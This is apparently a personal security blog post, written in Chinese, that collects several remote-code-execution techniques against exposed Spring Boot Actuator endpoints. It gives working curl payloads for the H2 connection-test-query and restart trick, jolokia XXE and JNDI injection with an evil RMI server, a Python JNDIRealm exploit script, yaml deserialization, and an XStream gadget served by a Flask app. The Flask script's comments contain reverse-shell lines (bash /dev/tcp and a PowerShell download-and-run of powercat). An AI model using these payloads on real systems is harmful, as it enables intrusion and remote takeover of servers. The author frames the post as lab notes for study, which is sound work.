springboot下rce的多种姿势

2020-06-03

springboot actuator除了信息泄露，更大的危害是可能导致rce，记录一下。
首先查看是否有env路由，不一定在根目录下，可能在二级目录下。找到后查看是否允许post请求，能的话可以尝试rce，有几种方法。

springboot2

第一种是最新的，需要springboot2，开启restart路由。
流程很简单，首先修改spring.datasource.hikari.connection-test-query，创建一个新的数据库连接时这个变量的值就会执行，修改它为命令执行的代码

curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'curl http://x.burpcollaborator.net\');\"}' 'http://localhost:8080/actuator/env'

然后重启应用

1	curl -X 'POST' -H 'Content-Type: application/json' 'http://localhost:8080/actuator/restart'

我这里用作者给的docker实验，不知道为什么用burp的collaborator收不到请求，用vps开了个端口收到了。但是命令执行后程序就会退出，不知道是特例还是共性。
后几种都是springboot1下的。

jolokia1

第一种是利用jolokia。首先访问jolokia/list，查看是否存在reloadByURL，有的话就可以利用。漏洞环境https://github.com/veracode-research/actuator-testbed
首先可以xxe

<!--logback.xml-->
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://127.0.0.1:9999/file.dtd">%remote;%int;]>
<a>&trick;</a>

<!--file.dtd-->
<!ENTITY % d SYSTEM "file:///C:/wamp/1.txt"> 
<!ENTITY % int "<!ENTITY trick SYSTEM 'http://127.0.0.1:9999/%d;'>">

访问http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:9999!/logback.xml
即可完成攻击
然后还可以实现rce，利用的是JNDI注入。
修改logback.xml

1
2
3

<configuration>
  <insertFromJNDI env-entry-name="rmi://127.0.0.1:1097/jndi" as="appName" />
</configuration>

修改rmiserver，代码来自https://github.com/mpgn/Spring-Boot-Actuator-Exploit


import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
 
public class EvilRMIServer {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);
 
        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd.exe','/c','calc.exe']).start()\")"));
 
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("jndi", referenceWrapper);
    }
}

启动rmi服务

1	java -Djava.rmi.server.hostname=127.0.0.1 -jar RMIServer-0.1.0.jar

还是访问同一个链接，执行命令。

jolokia2

jolokia还有一种jndi注入rce的方法，查看/jolokia/list中org.apache.catalina.mbeans.MBeanFactory是否存在。
直接python打，还是自己起一个rmiserver

#-*-coding:utf8-*-
import requests as req
import sys
from pprint import pprint

url = sys.argv[1] + "/jolokia/"
pprint(url)
#创建JNDIRealm
create_JNDIrealm = {
    "mbean": "Tomcat:type=MBeanFactory",
    "type": "EXEC",
    "operation": "createJNDIRealm",
    "arguments": ["Tomcat:type=Engine"]
}
#写入contextFactory
set_contextFactory = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "contextFactory",
    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}
#写入connectionURL为自己公网RMI service地址
set_connectionURL = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "connectionURL",
    "value": "rmi://127.0.0.1:1097/jndi"
}
#停止Realm
stop_JNDIrealm = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "stop",
    "arguments": []
}
#运行Realm，触发JNDI 注入
start = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "start",
    "arguments": []
}

expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]

for i in expoloit:
    rep = req.post(url, json=i)
    pprint(rep.json())

yaml反序列化

利用spring Cloud的spring.cloud.bootstrap.location属性配合yaml反序列化实现rce，参考https://github.com/artsploit/yaml-payload

1 2	javac src/artsploit/AwesomeScriptEngineFactory.java jar -cvf yaml-payload.jar -C src/ .

向env端点post发送spring.cloud.bootstrap.location=http://x.x.x.x/yaml-payload.yml，其中yml内容为

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:9999/yaml-payload.jar"]
  ]]
]

之后post请求refresh端点触发。我这里失败了，只发起了向yml的http请求没有执行命令，应该是环境没有cloud。

xstream反序列化

利用xstream反序列化。首先查看env中是否有netflix，或者configprops下有没有eureka，有的话可以利用，没有的话也不一定利用不了。
开启python脚本

#-*-coding:utf8-*-
# linux反弹shell 
#<string>bash</string>
#<string>-c</string>
#<string>bash -i >&amp; /dev/tcp/192.168.20.82/9999 0>&amp;1</string>
# windows反弹shell
# <string>powershell</string>
# <string>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');</string>
# <string>powercat -c 192.168.123.1 -p 2333 -e cmd</string>

from flask import Flask, Response

app = Flask(__name__)

@app.route('/xstream', defaults={'path': ''})
@app.route('/xstream/<path:path>')
def catch_all(path):
    xml = """<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                    <string>cmd.exe</string>
                    <string>/c</string>
                    <string>calc.exe</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>"""
    return Response(xml, mimetype='application/xml')
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=2333)

然后向env发起post请求eureka.client.serviceUrl.defaultZone=http://127.0.0.1:2333/xstream
然后post请求refresh，触发命令。我这里实验是定时执行，一分钟两次。
没啥新内容，就是整理记录一下，感觉最后一种好用一点。

参考链接
https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
https://www.freebuf.com/column/234266.html
https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
https://www.cnblogs.com/junsec/p/12066305.html